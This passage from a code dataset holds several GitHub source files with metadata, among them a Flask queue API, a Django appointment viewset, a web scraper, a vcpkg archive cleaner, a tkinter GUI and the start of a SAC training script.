numero_guiche\n\n if setor == 'Gerência':\n numero_gerencia += 1\n return numero_gerencia\n\n\ndef verificar_numero(setor):\n if setor == 'Caixa':\n return numero_caixa\n elif setor == 'Guichê':\n return numero_guiche\n else:\n return numero_gerencia\n\n\ndef zero_left(num):\n if num < 10:\n return '00' + str(num)\n elif num <= 100:\n return '0' + str(num)\n else:\n return str(num)\n\n\nclass Create:\n def __init__(self, setor, tipo, number):\n self.setor = setor\n self.tipo = tipo\n self.number = int(number)\n\n def ticket(self):\n if self.setor == 'Caixa':\n if self.tipo == 'Prioridade':\n return 'CXP' + zero_left(self.number)\n else:\n return 'CXC' + zero_left(self.number)\n if self.setor == 'Guichê':\n if self.tipo == 'Prioridade':\n return 'GHP' + zero_left(self.number)\n else:\n return 'GHC' + zero_left(self.number)\n if self.setor == 'Gerência':\n if self.tipo == 'Prioridade':\n return 'GEP' + zero_left(self.number)\n else:\n return 'GEC' + zero_left(self.number)\n\n\ndef insert_desk(desk_to_attend, client_id):\n 
for key in queue:\n if key['id'] == client_id:\n key['mesa'] = desk_to_attend['desk_name']\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"
Distant Reading Archive\nThis site is a prototype API for distant reading of science fiction novels.\n
    \"\n\n\n@app.route('/desks', methods=['GET', 'POST'])\ndef desks():\n if request.method == 'GET':\n return jsonify(service_desk)\n\n if request.method == 'POST':\n desk_to_attend = request.get_json()\n insert_desk(desk_to_attend, desk_to_attend['client'])\n return jsonify(desk_to_attend)\n\n\ndef delete_client_ticket(client_id):\n for key in queue:\n if key['id'] == client_id:\n queue.remove(key)\n print('[achou:]', key)\n\n\n@app.route('/service', methods=['GET', 'POST', 'DELETE'])\ndef service():\n if request.method == 'DELETE':\n client_id = request.get_json()\n delete_client_ticket(client_id)\n return jsonify(client_id)\n\n if request.method == 'GET':\n return jsonify(list(reversed(queue)))\n\n if request.method == 'POST':\n data = request.get_json()\n\n # Adicionando número de ticket de acordo com o setor\n data['number'] = str(numero_ticket(data['setor']))\n\n # Declarando o atributo na classe\n client = Create(data['setor'], data['tipo'], verificar_numero(data['setor']))\n\n # Gerando a senha\n data['senha'] = client.ticket()\n\n queue.insert(0, data)\n\n return jsonify(queue)\n\n\napp.run()\n","repo_name":"AleNoia/gerenciamento-de-filas","sub_path":"API/pythonProject2/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27301771109","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef spider():\n url = 'http://www.whu.edu.cn/'\n html = requests.get(url).content\n html = BeautifulSoup(html, 'lxml')\n\n # 创建CSS选择器,获取 珞珈新闻 标题\n ul = html.select('div[class=\"panel\"] div ul[class=\"list-unstyled list\"]')[0]\n li = ul.select('li a')\n print('珞珈新闻标题如下:')\n for a in li:\n print(a['title'])\n\n # 创建CSS选择器,获取 学术动态 标题\n ul = html.select('div[class=\"panel\"] div ul[class=\"list-unstyled list\"]')[1]\n li = ul.select('li a')\n print('学术动态标题如下:')\n for a in li:\n print(a['title'])\n\n # 创建CSS选择器,获取 通知公告 标题\n ul = html.select('div[class=\"panel\"] div ul[class=\"list-unstyled list\"]')[2]\n li = ul.select('li a')\n print('通知公告标题如下:')\n for a in li:\n print(a['title'])\n\nif __name__ == \"__main__\":\n spider()","repo_name":"zehuizhou/spider","sub_path":"bs4例子/whu_spider.py","file_name":"whu_spider.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38406327826","text":"from django.urls import path,include \nfrom . import views\n\napp_name='student'\n\nurlpatterns = [\n path('', views.register,name='register'),\n path('display', views.display,name='display'),\n path('update/', views.update,name='update'),\n path('delete/', views.delete,name='delete'),\n]\n\n\n","repo_name":"jicsoon/demoproject","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13169855929","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\nFile Name: 括号匹配\nDescription : \nAuthor : wellqin\ndate: 2020/3/24\nChange Activity: 2020/3/24\n\n1. 给定一个只包括 '(',')'的字符串,判断字符串是否有效。\n 思路:遇到 \"(\" 就让它入栈,遇到 \")\" 就判断下栈里面有没有 \"(\"\n (1)如果有,则把处于栈顶的 \"(\" 弹出,相当于和 \")\" 进行匹配,然后继续往后遍历字符串\n (2)如果没有,则匹配失败。相当于字符串的最前面出现了 \")\",显然这是不合理的。\n\n2. 
LT20:给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效\n-------------------------------------------------\n\"\"\"\n\nclass Solution:\n def isValid(self, s):\n # 时间,空间复杂度是 O(n)\n if not s:\n return True\n stack = []\n for i in s:\n if i == \"(\":\n stack.append(i)\n else:\n if not stack:\n return False\n else:\n stack.pop()\n return stack == []\n\n def isValid1(self, s):\n # 时间O(n),空间O(1)\n # 由于我们栈里面存放的都是**同一种字符 **\"(\" ,其实我们可以用一个变量来取代栈的,\n # 这个变量就记录 \"(\" 的个数,遇到 \"(\" 变量就加 1,遇到 \")\" 变量就减 1,栈为空就相当于变量的值为 0。\n if not s:\n return True\n total = 0\n for i in s:\n if i == \"(\":\n total += 1\n else:\n if total == 0:\n return False\n else:\n total -= 1\n return total == 0\n\n # --------------------------------------------------------------------------------\n # 2. LT20:给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效\n # --------------------------------------------------------------------------------\n def isValidMu(self, s):\n # 1. 取巧方法,直接消除有效的括号直到为空,不为空则存在无效\n while '[]' in s or '()' in s or '{}' in s:\n s = s.replace('[]', '').replace('()', '').replace('{}', '')\n return len(s) == 0\n\n def isValidMu1(self, s):\n leftP = '([{'\n rightP = ')]}'\n stack = []\n for char in s:\n if char in leftP:\n stack.append(char)\n if char in rightP:\n if not stack:\n return False\n tmp = stack.pop()\n # 与栈中元素进行匹配,匹配不上则为False\n if char == ')' and tmp != '(':\n return False\n if char == ']' and tmp != '[':\n return False\n if char == '}' and tmp != '{':\n return False\n return stack == []\n\n def isValidSelfMu2(self, s):\n lookup = {\")\": \"(\", \"]\": \"[\", \"}\": \"{\"}\n stack = [] # 栈里面只保存待匹配的左括号\n for i in s:\n if stack and i in lookup: # 如果栈不为空 同时 当前的为右括号\n if stack[-1] == lookup[i]: # 如果栈中存在与右括号匹配的左括号\n stack.pop() # 则匹配到最小括号对,栈中进行删除\n else:\n stack.append(i)\n return not stack\n\ns = \"(()))\"\nprint(Solution().isValid1(s))","repo_name":"wellqin/USTC","sub_path":"DataStructure/栈/括号匹配.py","file_name":"括号匹配.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39534901102","text":"import os\nimport sys\nimport zipfile\n\nfrom pathlib import Path\n\ndef get_vcpkg_archives_list(vcpkg_path):\n for path, _, files in os.walk(vcpkg_path):\n for file in files:\n if file.endswith(\".zip\"):\n file_path = os.path.join(path, file)\n yield file_path\n\ndef read_control(control):\n package = ''\n version = '0'\n port_version = '0'\n architecture = ''\n lines = control.split('\\n')\n for line in lines:\n if (line != ''):\n pair = line.split(': ')\n if (pair[0] == 'Package'):\n package = pair[1]\n elif (pair[0] == 'Version'):\n version = pair[1]\n elif (pair[0] == 'Port-Version'):\n port_version = pair[1]\n elif (pair[0] == 'Architecture'):\n architecture = pair[1]\n return package, version + '-' + port_version, architecture\n\ndef get_packages(archives):\n packages = {}\n for archive in archives:\n zip_file = zipfile.ZipFile(archive, 'r')\n control = zip_file.read('CONTROL')\n package, version, architecture = read_control(control.decode('utf-8'))\n if (architecture not in packages.keys()):\n packages[architecture] = {}\n if (package not in packages[architecture].keys()):\n packages[architecture][package] = {}\n if (version not in packages[architecture][package].keys()):\n packages[architecture][package][version] = []\n if (archive not in packages[architecture][package][version]):\n packages[architecture][package][version].append(archive)\n return packages\n\ndef print_packages(packages):\n for architecture in 
packages:\n print(architecture)\n for package in packages[architecture]:\n print('\\t', package)\n for version in packages[architecture][package]:\n print('\\t\\t', version)\n for archive in packages[architecture][package][version]:\n print('\\t\\t\\t', archive)\n\ndef mark_outdated_packages(packages):\n outdated = []\n for architecture in packages:\n for package in packages[architecture]:\n archives_with_same_version = {}\n max_version = sorted(packages[architecture][package].keys(), reverse=True)[0]\n for version in packages[architecture][package]:\n if (version != max_version):\n for archive in packages[architecture][package][version]:\n outdated.append(archive)\n else:\n if (len(packages[architecture][package][version]) == 1):\n continue\n for archive in packages[architecture][package][version]:\n archives_with_same_version[os.path.getmtime(archive)] = archive\n max_date = sorted(archives_with_same_version.keys(), reverse=True)[0]\n for archive in packages[architecture][package][version]:\n if (archive != archives_with_same_version[max_date]):\n outdated.append(archive)\n return outdated\n\ndef get_hash_from_name(name):\n return Path(name).stem\n\ndef get_hash_list(packages):\n hash_list = []\n for architecture in packages:\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n hash_list.append(get_hash_from_name(os.path.basename(archive)))\n return hash_list\n\ndef remove_outdated_from_hash_list(hash_list, outdated):\n for package in outdated:\n package_hash = get_hash_from_name(os.path.basename(package))\n if (package_hash in hash_list):\n hash_list.remove(package_hash)\n\ndef read_vcpkg_abi_info_content(content, packages):\n dependencies = []\n lines = content.split('\\n')\n for line in lines:\n if line:\n pair = line.split(' ')\n if (pair[0] in packages):\n dependencies.append(pair[1])\n return dependencies\n\ndef read_vcpkg_abi_info(archive, package, packages):\n zip_file = zipfile.ZipFile(archive, 'r')\n if (package == 'gtest'):\n package = 'GTest'\n file_name = 'share/'+package+'/vcpkg_abi_info.txt'\n try:\n info_file = zip_file.read(file_name)\n return read_vcpkg_abi_info_content(info_file.decode('utf-8'), packages)\n except Exception as ex:\n print('Failed to read the file', file_name, 'from', archive, ':', ex)\n return ''\n\ndef mark_duplicate_packages(packages, outdated):\n hash_list = get_hash_list(packages)\n remove_outdated_from_hash_list(hash_list, outdated)\n\n for architecture in packages:\n dependencies_list = {}\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n dependencies = read_vcpkg_abi_info(archive, package, packages[architecture].keys())\n if (len(dependencies) != 0):\n dependencies_list[get_hash_from_name(os.path.basename(archive))] = dependencies\n process_dependencies_list(dependencies_list, packages, outdated, hash_list, architecture)\n\ndef add_package_to_outdated_by_hash(packages, outdated, package_hash, architecture):\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n if (get_hash_from_name(os.path.basename(archive)) == package_hash and archive not in outdated):\n outdated.append(archive)\n return\n\ndef process_package_dependencies(package_hash, dependencies, packages, outdated, hash_list, architecture):\n is_valid = True\n if (package_hash not in 
hash_list):\n add_package_to_outdated_by_hash(packages, outdated, package_hash, architecture)\n is_valid = False\n if (package_hash not in dependencies):\n return is_valid\n package_dependencies = dependencies[package_hash]\n for dependency_hash in package_dependencies:\n is_valid = is_valid and process_package_dependencies(dependency_hash, dependencies, packages, outdated, hash_list, architecture)\n if (not is_valid):\n add_package_to_outdated_by_hash(packages, outdated, package_hash, architecture)\n if (package_hash in hash_list):\n hash_list.remove(package_hash)\n return False\n return is_valid\n\ndef process_dependencies_list(dependencies, packages, outdated, hash_list, architecture):\n for package_hash in dependencies:\n process_package_dependencies(package_hash, dependencies, packages, outdated, hash_list, architecture)\n\ndef print_outdated(outdated, packages):\n for architecture in packages:\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n if (archive in outdated):\n print(architecture, package, version, archive, sep=' -> ')\n\ndef remove_outdated(outdated):\n for archive in outdated:\n os.remove(archive)\n\ndef help():\n print('Usage: python CleanVcpkgArchive.py ')\n\nif(len(sys.argv) != 2):\n help()\n exit(1)\n\nvcpkg_path = sys.argv[1]\n\nvcpkg_archives_list = get_vcpkg_archives_list(vcpkg_path)\nvcpkg_packages = get_packages(vcpkg_archives_list)\nprint_packages(vcpkg_packages)\noutdated = mark_outdated_packages(vcpkg_packages)\nmark_duplicate_packages(vcpkg_packages, outdated)\nprint('Outdated packages:')\nprint_outdated(outdated, vcpkg_packages)\nremove_outdated(outdated)\n","repo_name":"AenBleidd/Scripts","sub_path":"CleanVcpkgArchive.py","file_name":"CleanVcpkgArchive.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24397687282","text":"\"\"\"View module for handling requests about categories\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom talktherapyapi.models import Category, Appointment, User, Therapist\n\nclass AppointmentView(ViewSet):\n \"\"\"Closet Share appointment view\"\"\"\n\n def retrieve(self, request, pk):\n \n try:\n appointment = Appointment.objects.get(pk=pk)\n serializer = AppointmentSerializer(appointment)\n return Response(serializer.data, status=status.HTTP_200_OK)\n except Appointment.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n\n def list(self, request):\n \"\"\"Handle GET requests to get all Appointment\n\n Returns:\n Response -- JSON serialized list of appointment\n \"\"\"\n appointment = Appointment.objects.all()\n serializer = AppointmentSerializer(appointment, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n \"\"\"Handle POST requests to create a new Appointment\n Returns:\n Response -- JSON serialized Appointment\n \"\"\"\n print(\"Received request data:\", request.data)\n\n category_id = request.data[\"category_id\"]\n therapist_id = request.data[\"therapist_id\"]\n user_id = request.data[\"user\"]\n\n print(\"category_id:\", category_id)\n print(\"therapist_id:\", therapist_id)\n print(\"user_id:\", user_id)\n\n try:\n category = Category.objects.get(id=category_id)\n therapist 
= Therapist.objects.get(id=therapist_id)\n user = User.objects.get(id=user_id)\n\n appointment = Appointment.objects.create(\n user=user,\n therapist_id=therapist,\n category_id=category,\n service=request.data[\"service\"],\n day=request.data[\"day\"],\n time=request.data[\"time\"],\n time_ordered=request.data[\"time_ordered\"],\n )\n serializer = AppointmentSerializer(appointment)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n except Category.DoesNotExist as category_error:\n return Response({'message': f\"Category not found: {category_error}\"}, status=status.HTTP_400_BAD_REQUEST)\n except Therapist.DoesNotExist as therapist_error:\n return Response({'message': f\"Therapist not found: {therapist_error}\"}, status=status.HTTP_400_BAD_REQUEST)\n except User.DoesNotExist as user_error:\n return Response({'message': f\"User not found: {user_error}\"}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as ex:\n return Response({'message': str(ex)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n # def create(self, request):\n # \"\"\"Handle GET requests for single Appointment\n # Returns:\n # Response -- JSON serialized Appointment\n # \"\"\"\n\n # category = Category.objects.get(pk=request.data[\"category_id\"])\n # therapist = Therapist.objects.get(pk=request.data[\"therapist_id\"])\n # patient = User.objects.get(pk=request.data[\"user\"])\n\n\n # appointment = Appointment.objects.create(\n # user=patient,\n # therapist_id=therapist,\n # category_id=category,\n # service=request.data[\"service\"],\n # day=request.data[\"day\"],\n # time=request.data[\"time\"],\n # time_ordered=request.data[\"time_ordered\"],\n # )\n # serializer = AppointmentSerializer(appointment)\n # return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n def update(self, request, pk):\n \"\"\"Handle PUT requests for an appointment\n\n Returns:\n Response -- Empty body with 204 status code\n \"\"\"\n \n appointment = Appointment.objects.get(pk=pk)\n category_id = Category.objects.get(pk=request.data[\"category_id\"])\n appointment.category_id = category_id\n therapist_id = Therapist.objects.get(pk=request.data[\"therapist_id\"])\n appointment.therapist_id = therapist_id\n user = User.objects.get(pk=request.data[\"user\"])\n appointment.user = user\n appointment.service = request.data[\"service\"]\n appointment.day = request.data[\"day\"]\n appointment.time = request.data[\"time\"]\n appointment.time_ordered = request.data[\"time_ordered\"]\n \n appointment.save()\n \n serializer = AppointmentSerializer(appointment)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def destroy(self, request, pk):\n \n appointment = Appointment.objects.get(pk=pk)\n appointment.delete()\n \n return Response(None, status=status.HTTP_204_NO_CONTENT)\n \n\nclass AppointmentSerializer(serializers.ModelSerializer):\n \"\"\"JSON serializer for categories\n \"\"\"\n class Meta:\n model = Appointment\n fields = ('id', 'user', 'therapist_id', 'category_id', 'service', 'day', 'time', 'time_ordered')\n","repo_name":"jakehardin/talktherapy","sub_path":"talktherapyapi/views/appointment.py","file_name":"appointment.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24744484948","text":"import pandas as pd\n\nG_labels = ['无', '0-2000', '2000-3999', '4000-5999', '6000-7999', '8000-9999', '1万以上']\nAA_labels = ['包含3项', '包含其中的一或两项', '完全不包含']\n\n\ndef G_preprocess(inputs):\n try:\n if '万' in 
inputs:\n try:\n tmp_ = int(int(inputs.split(\"-\")[1].replace(\"元/年\", \"\").replace(\"万\", \"0000\")) / 12)\n except:\n tmp_ = int(20000 / 12)\n elif '元/年' in inputs:\n tmp_ = int(int(inputs.split(\"-\")[1].replace(\"元/年\", \"\")) / 12)\n else:\n try:\n tmp_ = int(inputs.split(\"-\")[1].replace(\"元/月\", \"\").replace(\"以下元/月\", \"\"))\n except:\n tmp_ = '无'\n return tmp_\n except:\n return '无'\n\n\ndef label_G(inputs):\n if isinstance(inputs, int):\n if 0 <= inputs <= 2000:\n return G_labels[1]\n if 2000 <= inputs <= 3999:\n return G_labels[2]\n elif 4000 <= inputs <= 5999:\n return G_labels[3]\n elif 6000 <= inputs <= 7999:\n return G_labels[4]\n elif 8000 <= inputs <= 9999:\n return G_labels[5]\n elif inputs >= 10000:\n return G_labels[6]\n else:\n return inputs\n else:\n return G_labels[0]\n\n\n\"\"\"\n技能/语言\n思就是说包含Photoshop、Corel DRAW,AI这三个技能的分成一类,包含其中的一或两项的分成一类,完全不包含的分成一类\n\"\"\"\n\n\ndef label_AA(inputs):\n if inputs == 'PS,AI.DW,(精通)' or inputs == 'Photoshop/CDR(良好)':\n return AA_labels[1]\n if inputs == '英语(熟练) Word/Excel/ PPT/Photoshop(熟练) bootstrap(良好) Jquery(熟练) HTML/CSS/JavaScript(精通)':\n return AA_labels[1]\n\n tmp_ = []\n\n for item in str(inputs).lower().split(' '):\n for item2 in item.split(\"、\"):\n item3 = item2.replace(\"熟练\", \"\").replace(\"一般\", \"\").replace(\"良好\", \"\").replace(\")\", \"\").replace(\"(\", \"\")\n tmp_.append(item3.replace(\"精通\", \"\").replace(\" adobe photoshop\", 'photoshop'))\n\n print(tmp_)\n\n label1 = ['Photoshop', 'Corel DRAW', 'AI']\n num = 0\n for i in label1:\n for j in tmp_:\n if i.lower() == j:\n num += 1\n\n if num == 3:\n return AA_labels[0]\n elif num == 2 or num == 1:\n return AA_labels[1]\n else:\n return AA_labels[2]\n\n\ndata = pd.read_excel(\"data1.xlsx\")\nprint(\"开始打标签...\")\ndata['G_preprocess'] = data['期望薪资'].apply(G_preprocess)\ndata['G_label'] = data['G_preprocess'].apply(label_G)\ndata['AA_label'] = data['技能/语言'].apply(label_AA)\ndel data['G_preprocess']\ndata.to_excel(\"results.xlsx\", index=None)\nprint('保存成功!')\n","repo_name":"Alvin2580du/alvin_py","sub_path":"business/p201909/150/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"4270389227","text":"try:\r\n import os, sys\r\n import tkinter as tk\r\n from tkinter.messagebox import askokcancel, showinfo\r\n from tkinter.filedialog import *\r\n import webbrowser\r\n import cVolumeAssessment as cMT\r\nexcept:\r\n print(\"ExceptionERROR: Missing fundamental packages (required: os, sys, tkinter, webbrowser).\")\r\n\r\ntry:\r\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\\")\r\n import child_gui as sg\r\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\.site_packages\\\\riverpy\\\\\")\r\n import config\r\n import fGlobal as fGl\r\n import cReachManager as cRM\r\n import cDefinitions as cDef\r\n import cMapper as cMp\r\nexcept:\r\n print(\"ExceptionERROR: Cannot find package files (/.site_packages/riverpy/*.py).\")\r\n\r\n\r\nclass MainGui(sg.RaModuleGui):\r\n def __init__(self, from_master):\r\n sg.RaModuleGui.__init__(self, from_master)\r\n self.ww = 580 # window width\r\n self.wh = 650 # window height\r\n self.title = \"Volume Assessment\"\r\n self.set_geometry(self.ww, self.wh, self.title)\r\n\r\n self.dir_ras_vol = \"\"\r\n\r\n self.org_dem_dir = config.dir2conditions\r\n self.mod_dem_dir = config.dir2conditions\r\n self.raster4mapping = []\r\n 
self.template_dir = config.dir2va + \".templates\\\\\"\r\n self.vol_name = \"\"\r\n\r\n # GUI OBJECT VARIABLES\r\n self.gui_condition = tk.StringVar()\r\n self.gui_interpreter = tk.StringVar()\r\n self.mapping = tk.BooleanVar()\r\n\r\n # LABELS\r\n self.l_reach_label = tk.Label(self, fg=\"dark slate gray\", text=\"Reaches:\")\r\n self.l_reach_label.grid(sticky=tk.W, row=0, column=0, columnspan=1, padx=self.xd, pady=self.yd * 2)\r\n self.l_reaches = tk.Label(self, fg=\"red\", text=\"Select from Reaches menu\")\r\n self.l_reaches.grid(sticky=tk.W, row=0, column=1, columnspan=5, padx=self.xd, pady=self.yd * 2)\r\n\r\n self.l_org_dem = tk.Label(self, text=\"Original DEM Raster:\")\r\n self.l_org_dem.grid(sticky=tk.W, row=4, column=0, columnspan=2, padx=self.xd, pady=self.yd)\r\n self.l_dir2orgdem = tk.Label(self, fg=\"dark slate gray\", text=\"None\")\r\n self.l_dir2orgdem.grid(sticky=tk.W, row=5, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n self.l_mod_dem = tk.Label(self, text=\"Modified DEM Raster:\")\r\n self.l_mod_dem.grid(sticky=tk.W, row=13, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n self.l_dir2modem = tk.Label(self, fg=\"dark slate gray\", text=\"None\")\r\n self.l_dir2modem.grid(sticky=tk.W, row=14, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n\r\n # BUTTONS\r\n self.b_chg_org_dem = tk.Button(self, width=25, bg=\"white\", text=\"Select original DEM Raster\",\r\n command=lambda: self.select_org_dem())\r\n self.b_chg_org_dem.grid(sticky=tk.EW, row=3, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n self.b_chg_mod_dem = tk.Button(self, width=25, text=\"Select modified DEM Raster\",\r\n command=lambda: self.select_mod_dem())\r\n self.b_chg_mod_dem.grid(sticky=tk.EW, row=12, column=0, columnspan=5, padx=self.xd, pady=self.yd)\r\n\r\n self.complete_menus()\r\n\r\n # CHECK BOXES\r\n self.cb_mapping = tk.Checkbutton(self, fg=\"dark slate gray\",\r\n text=\"Automatically run mapping after DEM / volume calculation.\",\r\n variable=self.mapping, onvalue=True, offvalue=False)\r\n self.cb_mapping.grid(sticky=tk.W, row=15, column=0, columnspan=5, padx=self.xd, pady=self.yd*2)\r\n self.cb_mapping.deselect() # select by default\r\n\r\n def complete_menus(self):\r\n # REACH DROP DOWN\r\n self.reach_lookup_needed = False\r\n self.reachmenu = tk.Menu(self.mbar, tearoff=0) # create new menu\r\n self.mbar.add_cascade(label=\"Reaches\", menu=self.reachmenu) # attach it to the menubar\r\n self.reachmenu = self.make_reach_menu(self.reachmenu)\r\n\r\n # RUN DROP DOWN\r\n self.runmenu = tk.Menu(self.mbar, tearoff=0) # create new menu\r\n self.mbar.add_cascade(label=\"Run\", menu=self.runmenu) # attach it to the menubar\r\n self.runmenu.add_command(label=\"Run: Volume Calculator\", command=lambda: self.run_volume_calculator())\r\n self.runmenu.add_command(label=\"Run: Map Maker\", command=lambda: showinfo(\"INFO\", \"Run volume calculator first.\"))\r\n\r\n def select_mod_dem(self):\r\n self.mod_dem_dir = askopenfilename(initialdir=self.mod_dem_dir.split(\".\")[0],\r\n title=\"Select modified DEM tif\",\r\n filetypes=[(\"GeoTIFF\", \"*.tif\")])\r\n if str(self.l_dir2modem).__len__() > 1:\r\n self.l_dir2modem.config(fg=\"forest green\", text=str(self.mod_dem_dir))\r\n else:\r\n self.l_dir2modem.config(fg=\"red\", text=\"Invalid directory\")\r\n\r\n def select_org_dem(self):\r\n self.org_dem_dir = askopenfilename(initialdir=self.org_dem_dir.split(\".\")[0],\r\n title=\"Select original DEM tif\",\r\n filetypes=[(\"GeoTIFF\", \"*.tif\")])\r\n if 
str(self.org_dem_dir).__len__() > 1:\r\n self.l_dir2orgdem.config(fg=\"forest green\", text=str(self.org_dem_dir))\r\n else:\r\n self.l_dir2orgdem.config(fg=\"red\", text=\"Invalid directory\")\r\n\r\n def run_map_maker(self):\r\n mapper = cMp.Mapper(self.vol_name, \"mt\", self.dir_ras_vol)\r\n for ras in self.raster4mapping:\r\n mapper.prepare_layout(True, map_items=[ras])\r\n\r\n self.master.bell()\r\n tk.Button(self, width=25, bg=\"pale green\", text=\"Mapping finished. Click to quit.\",\r\n command=lambda: self.quit_tab()).grid(sticky=tk.EW, row=12, column=0, columnspan=5,\r\n padx=self.xd, pady=self.yd)\r\n try:\r\n if not mapper.error:\r\n fGl.open_folder(mapper.output_dir)\r\n except:\r\n pass\r\n\r\n def run_volume_calculator(self):\r\n showinfo(\"INFORMATION\",\r\n \" Analysis may take a while.\\nPython windows seem unresponsive in the meanwhile.\\nCheck console messages.\\n \\n PRESS OK TO START\")\r\n vola = cMT.VolumeAssessment(unit_system=self.unit, org_ras_dir=self.org_dem_dir,\r\n mod_ras_dir=self.mod_dem_dir, reach_ids=self.reach_ids_applied)\r\n self.vol_name, self.dir_ras_vol = vola.get_volumes()\r\n self.raster4mapping = vola.rasters\r\n try:\r\n fGl.rm_dir(vola.cache)\r\n except:\r\n showinfo(\"WARNING\", \"Could not remove %s.\\nManual deletion required\")\r\n\r\n self.runmenu.entryconfig(1, command=lambda: self.run_map_maker())\r\n if self.mapping.get():\r\n self.run_map_maker()\r\n self.master.bell()\r\n\r\n def __call__(self):\r\n self.mainloop()\r\n","repo_name":"RiverArchitect/program","sub_path":"VolumeAssessment/volume_gui.py","file_name":"volume_gui.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"5479993369","text":"# test waiting within async with enter/exit functions\n\n# uPy allows normal generators to be awaitables.\n# CircuitPython does not.\n# In CircuitPython you need to have an __await__ method on an awaitable like in CPython;\n# and like in CPython, generators do not have __await__.\n\nclass Awaitable:\n def __init__(self, x):\n self.x = x\n\n def __await__(self):\n print('f start:', self.x)\n yield self.x + 1\n yield self.x + 2\n return self.x + 3\n\nclass AContext:\n async def __aenter__(self):\n print('enter')\n print('f returned:', await Awaitable(10))\n async def __aexit__(self, exc_type, exc, tb):\n print('exit', exc_type, exc)\n print('f returned:', await Awaitable(20))\n\nasync def coro():\n async with AContext():\n print('body start')\n print('body f returned:', await Awaitable(30))\n print('body end')\n\no = coro()\ntry:\n while True:\n print('coro yielded:', o.send(None))\nexcept StopIteration:\n print('finished')\n","repo_name":"KMKfw/kmkpython","sub_path":"tests/basics/async_with2.py","file_name":"async_with2.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"2897235687","text":"from Bio import Phylo\nimport os,sys,glob,re\nimport copy\n\nDIR = sys.argv[1]\nif DIR[-1] != \"/\": DIR += \"/\"\n\nt_list = ['t2','t3','t5','t6','t8','t9','t11','t12','t14','t15','t17','t18','t20','t21','t23','t24']\n\nfor t in os.listdir(DIR):\n\tif t.endswith('nex.con.tre.new'):\n\t\tname = t.split('.')[0]\n\t\ttree = Phylo.read(DIR+t, \"newick\")\n\t\tnewtree = copy.deepcopy(tree)\n\t\tfor p in t_list:\n\t\t\tnewtree.prune(p)\n\t\tPhylo.write(newtree, DIR+name+\".concat.trimmed.tre\", 
\"newick\")\t","repo_name":"TheDBStern/recombination_simulations_phylo","sub_path":"prune_tree.py","file_name":"prune_tree.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16855381886","text":"import argparse\nimport datetime\nimport gym\nimport math\nimport mxnet\nimport random\n\nfrom sac import SAC\nfrom sac.utils import MemoryBuffer\nfrom tensorboardX import SummaryWriter\n\nparser = argparse.ArgumentParser(description=\"Soft Actor-Critic (SAC) in MXNet\")\nparser.add_argument(\n \"--env-name\",\n default=\"MountainCarContinuous-v0\",\n help=\"Gym environment (default: MountainCarContinuous-v0)\",\n)\nparser.add_argument(\n \"--gamma\",\n type=float,\n default=0.99,\n help=\"discount factor for reward (default: 0.99)\",\n)\nparser.add_argument(\n \"--tau\",\n type=float,\n default=0.005,\n help=\"target smoothing coefficient(τ) (default: 0.005)\",\n)\nparser.add_argument(\n \"--lr\", type=float, default=0.003, help=\"learning rate (default: 0.0003)\"\n)\nparser.add_argument(\n \"--alpha\",\n type=float,\n default=0.5,\n help=\"Relative importance of the entropy term against the reward (default: 0.5)\",\n)\nparser.add_argument(\n \"--automatic_entropy_tuning\",\n type=bool,\n default=False,\n help=\"Automatically adjust α (default: False)\",\n)\nparser.add_argument(\n \"--seed\", type=int, default=42, help=\"random seed (default: 